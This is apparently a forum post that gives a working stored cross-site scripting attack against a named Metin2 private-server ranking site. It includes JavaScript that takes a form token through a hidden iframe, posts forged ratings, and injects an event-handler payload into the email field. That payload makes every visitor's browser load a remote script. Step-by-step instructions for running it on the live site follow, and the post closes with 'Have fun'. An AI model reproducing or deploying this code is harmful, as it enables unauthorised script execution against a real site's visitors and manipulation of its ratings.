Hi,
Here is a small example of a code injection on the top list: metin2pserver.info.
If you want to test it yourself:
I hosted the following script here ( [Hidden Content] ):
/**
* Rate.
*
* @param {string} serverId
* @param {string} name
* @param {string} email
* @param {number} rating
* @option 1 - Insufficient
* @option 2 - Inadequate
* @option 3 - Sufficient
* @option 4 - Satisfying
* @option 5 - Good
* @option 6 - Very good
* @param {string} comment
* @param {number} picture
* @option 1 - Warrior (m)
* @option 2 - Warrior (f)
* @option 3 - Ninja (m)
* @option 4 - Ninja (f)
* @option 5 - Sura (m)
* @option 6 - Sura (f)
* @option 7 - Shaman (m)
* @option 8 - Shaman (f)
*/
function rate(serverId, name, email, rating, comment, picture = 1) {
const root = document.documentElement;
const iframe = document.createElement('iframe');
iframe.style.setProperty('display', 'none');
iframe.src = `[Hidden Content]}`;
return new Promise((resolve) => {
iframe.onload = () => {
const [s] = iframe.contentDocument.getElementsByName('s');
const token = s && s.value;
root.removeChild(iframe);
const data = {
Name: name,
Email: email,
Rating: rating,
Comments: comment,
pic: picture,
id: serverId,
s: token,
};
const params = [];
for (const param in data) {
const value = data[param];
params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
}
const body = params.join('&');
if (token) {
fetch(iframe.src, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
},
body,
})
.then(() => resolve(true))
.catch(() => resolve(false));
} else {
resolve(false);
}
};
root.appendChild(iframe);
});
}
if (location.hash === '#methowashere') {
const serverId = /server-(.*?).html/.exec(location.href)[1];
const name = prompt('Your name');
const comment = prompt('Your comment');
rate(serverId, name, '', 1, comment);
}
To inject it, go to a server page (e. g.: [Hidden Content]).
Launch this script on the page:
/**
* Rate.
*
* @param {string} serverId
* @param {string} name
* @param {string} email
* @param {number} rating
* @option 1 - Insufficient
* @option 2 - Inadequate
* @option 3 - Sufficient
* @option 4 - Satisfying
* @option 5 - Good
* @option 6 - Very good
* @param {string} comment
* @param {number} picture
* @option 1 - Warrior (m)
* @option 2 - Warrior (f)
* @option 3 - Ninja (m)
* @option 4 - Ninja (f)
* @option 5 - Sura (m)
* @option 6 - Sura (f)
* @option 7 - Shaman (m)
* @option 8 - Shaman (f)
*/
function rate(serverId, name, email, rating, comment, picture = 1) {
const root = document.documentElement;
const iframe = document.createElement('iframe');
iframe.style.setProperty('display', 'none');
iframe.src = `[Hidden Content]}`;
return new Promise((resolve) => {
iframe.onload = () => {
const [s] = iframe.contentDocument.getElementsByName('s');
const token = s && s.value;
root.removeChild(iframe);
const data = {
Name: name,
Email: email,
Rating: rating,
Comments: comment,
pic: picture,
id: serverId,
s: token,
};
const params = [];
for (const param in data) {
const value = data[param];
params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
}
const body = params.join('&');
if (token) {
fetch(iframe.src, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
},
body,
})
.then(() => resolve(true))
.catch(() => resolve(false));
} else {
resolve(false);
}
};
root.appendChild(iframe);
});
}
/**
* Inject.
*
* @param {string} script
* @param {string} name
*/
function injectScript(script, name = 'Dummy') {
const serverId = /server-(.*?).html/.exec(location.href)[1];
const code = `$.getScript('${script}')`;
const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;
console.log(`Server: ${serverId}`);
console.log(`Name: ${name}`);
console.log(`Script: ${script}`);
console.log(`Injections: ${injection}`);
return rate(serverId, name, injection, 1, '[...]');
}
You can then inject it like this:
injectScript('[Hidden Content]').then((r) => console.log('Result: ', r));
You can then test it like this: [Hidden Content]
Have fun ?